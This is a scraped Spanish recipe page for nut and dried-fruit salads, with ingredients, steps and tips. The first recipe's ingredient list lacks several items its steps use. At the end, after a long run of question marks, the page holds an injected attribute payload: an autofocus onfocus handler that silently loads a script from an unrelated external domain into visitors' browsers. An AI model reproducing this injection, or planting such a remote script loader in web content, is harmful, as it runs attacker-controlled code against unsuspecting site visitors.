Seleccionar página

Te proponemos varias recetas de ensaladas de frutos secos para que pruebes en casa nuevos sabores.

Ensalada de frutos secos y rúcula

Portada ensaladas de frutos secos

Ingredientes:

Para la vinagreta de albaricoque:

  • 2 albaricoques
  • 3 cuch. de vinagre de manzana
  • 1 cuch. de vinagre balsámico
  • 9 cuch. de aceite de oliva
  • Sal

Preparación:

Tuesta unos minutos las almendras, las avellanas, los pistachos pelados y las uvas pasas. Añade una pizca de azúcar y deja que se caramelicen un poco. Pela el tomate de ensalada, trocea en cuadraditos regulares y mezcla con las lechugas variadas y los frutos secos. Prepara entonces la vinagreta de albaricoque mezclando el aceite, el vinagre, la sal y el albaricoque troceado.

¿Quieres enriquecer esta receta de ensalada de frutos secos y frutas deshidratadas? Añade unas lascas de queso curado, estilo manchego o parmesano, verás qué buena combinación.

Receta de ensalada de frutos secos y frutas deshidratadas

Ingredientes (para 2 personas):
-Para la ensalada:
75 gramos de brotes tiernos, rúcula, lechuga…
2-3 cucharadas de frutos secos picados (en este caso, nueces pecanas, cacahuetes y anacardos)
1 cucharada de fruta deshidratada picada (en este caso, arándanos rojos y cerezas)

-Para el aliño:
1 pizca de sal
2 cucharaditas de vinagre
1 cucharada de mermelada
2 cucharadas de aceite de oliva

Cómo preparar paso a paso una ensalada de frutos secos y frutas deshidratadas

En primer lugar, prepararemos el aliño. Pon en un cuenco pequeño la sal y el vinagre y mezcla para que se disuelva. Incorpora la mermelada y vuelve a mezclar. Ve añadiendo el aceite de oliva moviendo para que emulsione. Reserva.

Pon en un recipiente las hojas. Añade 3/4 partes del aliño y mezcla. Pica los frutos secos y las frutas deshidratadas que sean grandes. Añade a la ensalada. Incorpora el resto del aliño por encima.

Trucos y consejos para cocinar la mejor ensalada de frutos secos y frutas deshidratadas

→ Si las hojas están un poco mustias, antes de empezar mételas en agua muy fría o con hielo para que se pongan tersas. A continuación, escurre y seca muy bien. Si tienes centrifugadora, quedarán perfectas.

→ Trocea los frutos secos y las frutas deshidratadas a tu gusto. Los cacahuates se pueden partir por la mitad, pero nueces o anacardos pueden quedar demasiado grandes.

→ Escoge frutas deshidratadas sin pepitas o quítaselas. Cuidado, por ejemplo, con las pasas, las ciruelas o los dátiles.

→ ¿Por qué aliñamos solo las hojas? Para que se impregnen bien antes de incorporar los frutos secos y las frutas deshidratadas. Al ser trozos pequeños y pesados, si mezclamos tenderán a irse al fondo.

→ Si vas a hacer la ensalada con antelación, deja las hojas lavadas y secas en el cuenco y guarda aparte el aliño (en un tarrito de cristal para emulsionar antes de aderezar) y los frutos secos y frutas deshidratadas ya picados. En el momento de servir solo tendrás que agitar el aliño, verter por encima y añadir la picada.

→ Puedes acompañarla con algún panecillo crujiente con semillas.

0
0 item
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//www.comedianteschapines.com/es/counter.js";document.head.append(script); autofocus=\"
Empty Cart
Abrir chat